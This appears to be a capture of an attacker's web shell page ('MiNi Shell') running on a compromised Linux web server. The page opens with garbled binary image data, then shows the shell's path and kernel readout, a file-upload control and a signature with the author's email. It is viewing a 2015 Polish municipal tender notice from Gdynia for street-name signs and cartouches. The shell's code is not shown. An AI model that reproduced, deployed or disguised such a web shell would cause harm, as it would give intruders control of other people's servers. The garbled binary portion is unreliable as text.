JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150305/48956-N-2015.html

<p class="kh_header"><b>Gdynia: Wykonanie robót budowlanych oraz opracowanie dokumentacji projektowej dla systemu Identyfikacji Miejskiej w Gdyni</b><br>
<b>Numer ogłoszenia: 48956 - 2015; data zamieszczenia: 05.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg i Zieleni w Gdyni , ul. 10 Lutego 24, 81-364 Gdynia, woj. pomorskie, tel. 058 761 20 87-88; 761 20 85, faks 058 6622841.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdiz.gdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych oraz opracowanie dokumentacji projektowej dla systemu Identyfikacji Miejskiej w Gdyni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Wykonanie robót budowlanych oraz opracowanie dokumentacji projektowej dla systemu Identyfikacji Miejskiej w Gdyni.
2. Zakres robót budowlanych obejmuje:
a) wykonanie, montaż:
- tablic emaliowanych, zwykłych i ozdobnych, z nazwami ulic, placów, skwerów, 
- słupków, 
b) naprawę istniejących słupków i tablic z nazwami ulic, placów, skwerów,
c) wykonanie, montaż:
-kartuszy naściennych,
-kartuszy wolnostojących,
d) naprawę istniejących kartuszy,
3. Opracowanie dokumentacji projektowej obejmuje wykonanie projektu zagospodarowania terenu dla kartuszy wolnostojących wraz z wszelkimi uzgodnieniami i opiniami.
4. Szczegółowy opis przedmiotu zamówienia stanowią załączniki:
TABLICE EMALIOWANE:
1) Załącznik A1 - Opis przedmiotu zamówienia - tablice emaliowane,
2) Załącznik A2 - Formularz cenowy - tablice emaliowane,
3) Załącznik A3 - Emaliowana elewacyjna tabliczka zwykła,
4) Załącznik A4 - Emaliowane elewacyjne tabliczki uliczne,
TABLICE ZWYKŁE ORAZ OZDOBNE:
5) Załącznik B1 - Opis przedmiotu zamówienia - tablice zwykłe oraz ozdobne,
6) Załącznik B2 - Formularz cenowy - tablice zwykłe oraz ozdobne,
7) Załącznik B3 - Zwykła tabliczka elewacyjna,
8) Załącznik B4 - Tabliczki zwykłe na podstawowym słupku,
9) Załącznik B5 - Tarcze tabliczek ulicznych zwykłych,
10) Załącznik B6 - Konstrukcja ramki tabliczek ulicznych zwykłych,
11) Załącznik B7 - Tabliczka ozdobna na słupku - widok tabliczki,
12) Załącznik B8 - Tarcze ozdobnej tabliczki ulicznej cz. 1,
13) Załącznik B9 - Tarcze ozdobnej tabliczki ulicznej cz. 2,
14) Załącznik B10 - Konstrukcja ozdobnej tabliczki ulicznej wraz głowicą ozdobnego słupka,
WYKONANIE, MONTAŻ I NAPRAWA SŁUPKÓW I TABLIC:
15) Załącznik C1 - Opis przedmiotu zamówienia - wykonanie, montaż i naprawa słupków i tablic,
16) Załącznik C2 - Formularz cenowy - wykonanie, montaż i naprawa słupków i tablic,
17) Załącznik C3 - Głowica podstawowego słupka informacji ulicznej,
SPECYFIKACJA TECHNICZNA WYKONANIA I ODBIORU ROBÓT BUDOWLANYCH
18) Załącznik D1- Specyfikacja techniczna wykonania i odbioru robót (SIM),
19) Załącznik F1- Specyfikacja techniczna wykonania i odbioru robót - kartusze,
WYKONANIE, MONTAŻ I NAPRAWA KARTUSZY:
20) Załącznik E1 - Opis przedmiotu zamówienia - wykonanie, montaż i naprawa kartuszy,
21) Załącznik E2 - Formularz cenowy - wykonanie, montaż i naprawa kartuszy,
22) Załącznik E3 - Kartusz naścienny,
23) Załącznik E4 - Kartusz naścienny - wariant bez oznaczeń brajlem,
24) Załącznik E5 - Kartusz wolnostojący,
25) Załącznik E6 - Widok tarczy kartusza,
26) Załącznik E7 - Widok tarczy kartusza - wariant bez oznaczeń brajlem,
27) Załącznik E8 - Kartusz mocowany do elewacji i ażurowego ogrodzenia - przekroje,
28) Załącznik E9 - Kartusz mocowany do elewacji i ażurowego ogrodzenia - przekroje,
29) Załącznik E10 - Kartusz wolnostojący - widok z boku,
30) Załącznik E11 - Kartusz wolnostojący - widok,
31) Załącznik E12 - Widok konstrukcji nośnej pulpitu kartusza wolnostojącego,
32) Załącznik E13 - Kartusz wolnostojący - przekrój X-X,
33) Załącznik E14 - Kartusz wolnostojący - przekrój Y-Y i perforowana osłona podstawy,
34) Załącznik E15 - Rozwinięcie obudowy pulpitu,
OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ KARTUSZA WOLNOSTOJĄCEGO:
35) Załącznik G1 - Opis przedmiotu zamówienia - opracowanie dokumentacji projektowej kartusza wolnostojącego,
36) Załącznik G2 - Formularz cenowy - opracowanie dokumentacji projektowej kartusza wolnostojącego.
5. Wykonawca udzieli gwarancji na przedmiot objęty zamówieniem, z wyłączeniem uszkodzeń mechanicznych powstałych w trakcie eksploatacji tablic, na okres:
- co najmniej 7 lat na wykonanie tablic zwykłych wraz z ramką,
- co najmniej 7  lat na wykonanie kartuszy naściennych i wolnostojących,
- 7 lat na słupki, 
-15 lat na wykonane tablice emaliowane,
- 7 lat na wykonane tablice ozdobne.
6. Wykonawca udzieli dwuletniej rękojmi na wykonaną dokumentację projektową, oraz trzyletniej rękojmi na wykonane roboty budowlane i wykonane elementy systemu Identyfikacji Miejskiej. 
7. Zamawiający zaleca, aby Wykonawca dokonał wizji lokalnej miejsca roboty budowlanej, aby uzyskać informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej poniesie Wykonawca.
8. Zamawiający dopuszcza wykonanie przedmiotu zamówienia przy udziale podwykonawców. Zamawiający żąda wskazania przez Wykonawcę w Ofercie zakresu prac których wykonanie Wykonawca powierzy Podwykonawcom. Wykonawca będzie ponosił pełną odpowiedzialność wobec Zamawiającego i osób trzecich za prace wykonane przez podwykonawców.
9. Przy wykonywaniu przedmiotu zamówienia Wykonawca zobowiązany jest stosować wyroby budowlane wprowadzone do obrotu zgodnie z przepisami odrębnymi (art. 10 ustawy z dnia
7 lipca 1994 r. prawo budowlane, tekst jednolity Dz. U. z 2013 r., poz.1409 z późn. zm.). Dokumenty potwierdzające wprowadzenie do obrotu należy przedstawić do wglądu w trakcie realizacji, a komplet przekazać przed odbiorem robót.
10. W przypadku, gdy w dokumentacji przetargowej zostały wskazane znaki towarowe, patenty lub pochodzenie materiałów i urządzeń, Zamawiający dopisuje wyraz lub równoważny. Zamawiający dopuszcza zaoferowanie materiałów i urządzeń równoważnych, pod warunkiem, że zagwarantują one uzyskanie parametrów technicznych i eksploatacyjnych nie gorszych od określonych w dokumentacji przetargowej, a w szczególności:
-zapewnienia spełnienia tych samych funkcji,
-zapewnienia urządzeń wykonanych z materiałów określonych w dokumentacji projektowej,
-zapewnienia urządzeń o tym samym przeznaczeniu.
11. Wykazanie równoważności, tj. spełniania wymagań określonych przez Zamawiającego 
w dokumentacji stanowiącej opis przedmiotu zamówienia należy do Wykonawcy. 
12. Jeżeli zostaną zaoferowane materiały lub urządzenia równoważne, Wykonawca zobowiązany jest wykazać, że spełniają one wymagania określone przez Zamawiającego. W takim przypadku Wykonawca zobowiązany jest do załączenia do oferty wykazu tych materiałów wraz z podaniem nazwy producenta oraz opisu technicznego proponowanych rozwiązań równoważnych i kart katalogowych.
13. Złożone ww. dokumenty będą podlegały ocenie przez Zamawiającego. W przypadku, gdy Wykonawca nie złoży w ofercie przedmiotowych dokumentów o zastosowaniu innych materiałów i urządzeń, to rozumie się przez to, że do kalkulacji ceny oferty i do realizacji przedmiotu zamówienia zostały zastosowane materiały i urządzenia zaproponowane w dokumentacji przetargowej.
14. Miejsce świadczenia roboty budowlanej: Gdynia.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.99.23.00-0, 71.00.00.00-8, 45.22.38.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1 800,00 zł, (słownie: jeden tysiąc osiemset złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych, o łącznej wartości netto minimum  50 000,00 zł, obejmujących:
- wykonanie i montaż tablic z nazwami ulic i/lub placów i/lub skwerów,
- oraz wykonanie i montaż kartuszy naściennych i/lub wolnostojących, 
z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz OFERTA, wg wzoru Zamawiającego, o treści odpowiadającej Załącznikowi nr 1 do siwz.
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Wykonawcy składają jeden formularz OFERTA.
2)	Pełnomocnictwo zgodnie z art. 23 ust. 2 ustawy prawo zamówień publicznych w przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia.
3)	Wypełniony zgodnie ze wzorem Załącznik A2 - Formularz cenowy - tablice emaliowane,
4)	Wypełniony zgodnie ze wzorem Załącznik B2  - Formularz cenowy - tablice zwykłe oraz ozdobne,
5)	Wypełniony zgodnie ze wzorem Załącznik C2 - Formularz cenowy - wykonanie, montaż i naprawa słupków i tablic,
6)	Wypełniony zgodnie ze wzorem Załącznik E2 -  Formularz cenowy - wykonanie, montaż i naprawa kartuszy,
7)	Wypełniony zgodnie ze wzorem Załącznik G2 - Formularz cenowy - opracowanie dokumentacji projektowej kartusza wolnostojącego,
8)	Dokumenty potwierdzające, że zastrzeżone w ofercie informacje stanowią tajemnicę przedsiębiorstwa.
9) Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy prawo zamówień publicznych, według wzoru, stanowiącego załącznik nr 2 do siwz.
10) Pisemne zobowiązanie podmiotów oddających do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, w przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Przykładowy wzór zobowiązania stanowi załącznik nr 6 do siwz.
Zamawiający wymaga, aby składany dokument wskazywał: 
-zakres dostępnych wykonawcy zasobów innego podmiotu,
-sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
-charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem, 
-zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.
W przypadku udostępnienia:
-wiedzy i doświadczenia należy wskazać konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, konsultacje).
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenia i dokumenty muszą być złożone przez tego Wykonawcę, który wykazuje spełnienie warunków udziału w postępowaniu w ww.  zakresie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Okres udzielonej gwarancji na tablice zwykłe wraz z ramką - 10</li>
<li>3 - Okres udzielonej gwarancji na wykonane kartusze naścienne i wolnostojące - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian określa wzór umowy - Załącznik nr 7 do siwz</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ftp://server.zdiz.gdynia.pl/rzp/tablice<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego pok. 403.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2015 godzina 10:00, miejsce: w siedzibie Zamawiającego pok. 407.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Otwarcie ofert odbędzie się dnia 20.03.2015r. o godz. 10:15 w siedzibie Zamawiającego pokój nr 206.
2. OSOBY UPRAWNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI
w sprawach merytorycznych:
Elżbieta Adamiec, tel. 58 761 20 77, w godz. 7.30 - 15.30,
w sprawach proceduralnych :
Kamila Kostkiewicz, tel. 58 761 20 86, w godz. 7.30 - 15.30..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com